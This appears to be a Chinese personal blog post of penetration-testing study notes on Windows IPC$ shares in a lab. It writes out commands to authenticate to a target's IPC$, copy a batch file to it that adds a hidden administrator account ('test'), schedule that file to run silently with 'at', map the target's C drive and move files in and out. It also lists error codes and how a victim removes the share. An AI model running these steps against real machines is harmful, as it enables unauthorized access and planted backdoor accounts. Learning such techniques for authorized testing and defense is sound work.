<!DOCTYPE html><html lang="zh-cn"><head><meta name="generator" content="Hexo 3.9.0"><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><meta name="format-detection" content="telephone=no"><meta name="format-detection" content="email=no"><meta name="description"><meta name="keywords" content="github"><title>PenTest Vol.6 - 内网 | IPC 部分 - Naykcin's Page</title><link rel="stylesheet" href="/css/main_style.min.css"><link rel="icon" href="/logo.png"></head><body><input id="navi" type="checkbox"><ul class="main-navication"><li><a href="/"><span>Home</span></a></li><li><a href="https://github.com/NickYan7"><span>Github</span></a></li></ul><div class="wrapper" id="wrap"><div class="post-header"><label class="navi-button light" for="navi">MENU</label><img class="background" src="/uploads/background3.JPG"><div class="post-title"><h1 class="title">PenTest Vol.6 - 内网 | IPC 部分</h1><ul class="meta"><li><i class="icon icon-author"></i>Naykcin</li><li><i class="icon icon-clock"></i>9 Minutes</li><li><i class="icon icon-calendar"></i>September 2, 2019</li></ul></div></div><div class="article-content" style="max-width:800px"><h2 id="PenTest-Vol-6-内网-IPC-部分"><a href="#PenTest-Vol-6-内网-IPC-部分" class="headerlink" title="PenTest Vol.6 - 内网 | IPC 部分"></a><center>PenTest Vol.6 - 内网 | IPC 部分</center></h2><h3 id="📍-IPC"><a href="#📍-IPC" class="headerlink" title="📍 IPC"></a>📍 IPC</h3><p>🌍 IPC，Internet Process Connection，是共享“命名”管道的资源，它是为了让进程间相互通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限，在远程管理计算机和查看计算机的共享资源时使用。</p>
<p>IPC 常用的通信方式有：</p>
<ul>
<li>管道（包括<strong>匿名管道</strong>和<strong>命名管道</strong>）：匿名管道只能在本机上的父子进程之间通信，而命名管道不仅可以在本机上实现两个进程间的通信，还可以跨网络实现两个进程间的通信。</li>
<li>消息队列</li>
<li>信号量</li>
<li>共享存储</li>
<li>socket</li>
<li>streams</li>
<li>…</li>
</ul>
<p>其中 Socket 和 Streams 支持不同主机上的两个进程 IPC。</p>
<h3 id="📍-开启服务"><a href="#📍-开启服务" class="headerlink" title="📍 开启服务"></a>📍 开启服务</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">// 还没有搞清楚开启这两个服务的目的 </span><br><span class="line">// [已解决]这里是为了开启定时服务等，方便后面at运行定时任务</span><br><span class="line">c:\&gt;net start Schedule</span><br><span class="line"></span><br><span class="line">c:\&gt;net start wmiApSrv</span><br><span class="line"></span><br><span class="line">// 记得关闭防火墙</span><br></pre></td></tr></table></figure>

<h3 id="📍-建立-IPC"><a href="#📍-建立-IPC" class="headerlink" title="📍 建立 IPC"></a>📍 建立 IPC</h3><p>攻击者：172.16.232.209</p>
<p>目标主机：172.16.97.129</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c:\&gt;net use \\192.16.97.129\ipc$ /user:administrator &quot;123456&quot;</span><br></pre></td></tr></table></figure>

<ul>
<li><p>如果报错 53:找不到网络路径，说明目标主机开启了防火墙。</p>
</li>
<li><p>如果报错 1219:不允许一个用户使用一个以上用户名与服务器或共享资源的多重连接，说明已经连接过，删去再连接即可。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">// 删除某个ipc</span><br><span class="line">c:\&gt;net use \\172.16.97.129\ipc$ /del</span><br><span class="line"></span><br><span class="line">// 删除全部ipc连接</span><br><span class="line">c:\&gt;net use * /del /y</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>可以利用 IPC 空连接来测试对方是否开启了 IPC 默认共享服务：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// 如果连接成功说明对方主机开启了远程 IPC</span><br><span class="line">c:\&gt;net use \\172.16.97.129\\ipc$ /user:&quot;&quot; &quot;&quot;</span><br></pre></td></tr></table></figure>

<h3 id="📍-利用-IPC-传文件"><a href="#📍-利用-IPC-传文件" class="headerlink" title="📍 利用 IPC 传文件"></a>📍 利用 IPC 传文件</h3><p>可以利用这个方式来留后门。攻击者首先创建一个批处理文件 useradd.bat，内容为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">// 新建用户并加入管理员组</span><br><span class="line">c:\&gt;net user test 123123 /add</span><br><span class="line">c:\&gt;net localgroup administrators test /add</span><br></pre></td></tr></table></figure>

<p>然后，利用 IPC 将此批处理文件传送至目标主机：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c:\&gt;copy .\useradd.bat \\172.16.97.129\c$</span><br></pre></td></tr></table></figure>

<h3 id="📍-利用-IPC-查看目标主机系统时间"><a href="#📍-利用-IPC-查看目标主机系统时间" class="headerlink" title="📍 利用 IPC 查看目标主机系统时间"></a>📍 利用 IPC 查看目标主机系统时间</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c:\&gt;net time \\172.16.97.129</span><br></pre></td></tr></table></figure>

<h3 id="📍-运行计划任务"><a href="#📍-运行计划任务" class="headerlink" title="📍 运行计划任务"></a>📍 运行计划任务</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c:\&gt;at \\172.16.97.129 19:45 c:\useradd.bat</span><br></pre></td></tr></table></figure>

<h3 id="📍-确认是否启动"><a href="#📍-确认是否启动" class="headerlink" title="📍 确认是否启动"></a>📍 确认是否启动</h3><p>该程序会静默运行，只能在任务管理器里看到。</p>
<h3 id="📍-映射目标主机某个盘符到本地"><a href="#📍-映射目标主机某个盘符到本地" class="headerlink" title="📍 映射目标主机某个盘符到本地"></a>📍 映射目标主机某个盘符到本地</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// 这里映射的是c盘，要注意空格。</span><br><span class="line">c:\&gt;net use Z: \\172.16.97.129\c$</span><br></pre></td></tr></table></figure>

<h3 id="📍-断开-IPC-连接"><a href="#📍-断开-IPC-连接" class="headerlink" title="📍 断开 IPC 连接"></a>📍 断开 IPC 连接</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">// 查看当前都有哪些连接</span><br><span class="line">c:\&gt;net use</span><br><span class="line"></span><br><span class="line">// 删除特定的连接</span><br><span class="line">c:\&gt;net use \\172.16.97.129 /del</span><br><span class="line"></span><br><span class="line">// 删除全部连接</span><br><span class="line">c:\&gt;net use</span><br></pre></td></tr></table></figure>

<h3 id="📍-关闭-IPC"><a href="#📍-关闭-IPC" class="headerlink" title="📍 关闭 IPC"></a>📍 关闭 IPC</h3><p>受害者主机操作：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">// 查看当前的共享</span><br><span class="line">c:\&gt;net share</span><br><span class="line"></span><br><span class="line">// 删除IPC$</span><br><span class="line">c:\&gt;net share ipc$ /del</span><br></pre></td></tr></table></figure>

<h3 id="📍-常用命令"><a href="#📍-常用命令" class="headerlink" title="📍 常用命令"></a>📍 常用命令</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">// 查看目标主机共享的资源</span><br><span class="line">c:\&gt;net view \\172.16.97.129</span><br><span class="line"></span><br><span class="line">// 查看目标主机的NETBIOS用户（自己本机也需要开启）</span><br><span class="line">c:\&gt;nbtstat -A 172.16.97.129</span><br><span class="line"></span><br><span class="line">// 文件上传与下载</span><br><span class="line">c:\&gt;copy .\test.txt \\172.16.97.129\c$\windows\temp\test.txt</span><br><span class="line"></span><br><span class="line">c:\&gt;copy \\172.16.97.129\c$\test.txt c:\</span><br></pre></td></tr></table></figure>

<h3 id="📍-常见错误分析："><a href="#📍-常见错误分析：" class="headerlink" title="📍 常见错误分析："></a>📍 常见错误分析：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">错误号 5，拒绝访问：可能是使用的用户不是管理员权限，需要先提权；</span><br><span class="line">错误号 51，Windows 无法找到网络路径：网络有问题；</span><br><span class="line">错误号 53，找不到网络路径：IP 地址错误；目标未开机；目标 manlanserver 服务未启动；目标主机开启了防火墙；</span><br><span class="line">错误号 67，找不到网络名：你的 lanmanworkstation 服务未启动，或者目标删除了ipc$；</span><br><span class="line">错误号 1219，提供的凭据与已存在的凭据集冲突：已经和对方建立了 ipc$ 连接，需要删除再重连；</span><br><span class="line">错误号 1326，未知的用户名或错误密码；</span><br><span class="line">错误号 1792，试图登录，但是网络登录服务没有启动：目标 netlogon 服务未启动；</span><br><span class="line">错误号 2242，此用户的密码已经过期：目标有账号策略，强制定期要求更改密码。</span><br></pre></td></tr></table></figure>

</div><div class="article-meta" style="max-width:800px"></div><ul class="navication"><li class="home"><a href="/"><i class="icon icon-home"></i></a></li><li><a href="/2019/10/03/emergency0/"><i class="icon icon-arror-left"></i></a></li><li><a href="/2019/08/07/denglu/"><i class="icon icon-arror-right"></i></a></li></ul><div class="page-footer"><div class="top"><ul class="social"><li><a href="https://github.com/NickYan7" title="Github" target="_blank"><i class="icon icon-github"></i></a></li><li><a href="http://47.95.140.43/tu/721580653348_.pic.jpg" title="wechat" target="_blank"><i class="icon icon-wechat"></i></a></li></ul></div><div class="bottom"><p class="copyright">© 2020 Naykcin's Page</p></div></div></div><script>var wrap = document.getElementById('wrap');
window.onload = function () {
  wrap.className += ' done';
}</script></body></html>